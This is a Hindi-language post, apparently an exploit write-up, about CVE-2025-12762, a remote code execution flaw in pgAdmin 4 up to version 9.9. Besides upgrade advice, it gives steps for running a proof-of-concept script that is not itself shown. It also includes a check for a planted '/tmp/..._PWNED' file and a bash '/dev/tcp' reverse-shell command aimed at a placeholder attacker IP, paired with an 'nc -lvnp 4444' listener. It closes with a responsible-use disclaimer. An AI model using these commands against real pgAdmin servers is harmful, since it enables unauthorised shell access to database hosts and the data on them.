
CVE-2025-12762

pgAdmin 4 संस्करण ≤ 9.9 में एक रिमोट कोड एक्सेक्यूशन (RCE) दोष मौजूद है। जब pgAdmin सर्वर मोड में चल रहा होता है और रिस्टोर के दौरान PLAIN-format SQL dump को प्रोसेस करता है, तो हमलावर होस्ट पर मनमाने कमांड चला सकते हैं।
🟥 9.1 / 10 — क्रिटिकल
⬆️ pgAdmin 4 v10.0 या उसके बाद के संस्करण में अपग्रेड करें
pgAdmin अक्सर महत्वपूर्ण PostgreSQL डेटाबेस के प्रशासन के लिए उपयोग किया जाता है, जिसका अर्थ है:
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests
# 3. Run it
python3 CVE-2025-12762.py
चलाने के बाद, जांचें:
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
फ़ाइल मौजूद है → आपने वास्तव में CVE-2025-12762 का शोषण कर लिया है।
COMMAND लाइन को इससे बदलें:
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
फिर nc -lvnp 4444 → पूर्ण इंटरैक्टिव शेल।
यह वही स्क्रिप्ट है जिसका उपयोग शोधकर्ता, पेंटेस्टर और रेड टीमें नवंबर 2025 में दुनिया भर में कर रहे हैं।
जिम्मेदारी से उपयोग करें। सब कुछ पैच करें। कानूनी रहें।
यह PoC केवल अधिकृत परीक्षण और शैक्षिक उपयोग के लिए प्रदान किया गया है।
आप इसे केवल उन सिस्टम पर चला सकते हैं जिनके मालिक आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
कोई भी अनधिकृत उपयोग अवैध है और कंप्यूटर दुरुपयोग कानूनों का उल्लंघन करता है।
जिम्मेदारी से उपयोग करें, परीक्षण के तुरंत बाद पैच करें, और बिना अनुमति के कभी भी सिस्टम को निशाना न बनाएं।